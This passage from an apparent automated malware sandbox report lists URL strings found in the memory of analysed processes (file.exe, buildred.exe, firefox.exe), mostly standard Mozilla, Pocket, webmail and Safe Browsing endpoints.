Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsor
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsjar:f
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1clearCache/this._cacheEntryPromise
Source: firefox.exe, 00000028.00000002.2895347761.0000026191ED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2947331057.00002FA5DCF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000028.00000002.2902841572.0000026192503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000028.00000002.2893311405.00000261907D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2913407729.0000026192ECC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000028.00000002.2913407729.0000026192ECC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%The
Source: firefox.exe, 00000028.00000002.2913407729.0000026192E9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2902841572.0000026192521000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDA72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestinitializeShowSearchSuggestionsFirstPref/matchGrou
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com_migrateXULStoreForDocumentbookmarksToolbarWasVisibledevice-connected-not
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.comFIXUP_FLAG_PRIVATE_CONTEXTFIXUP_FLAG_FORCE_ALTERNATE_URIexternalProtocol
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comPage
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
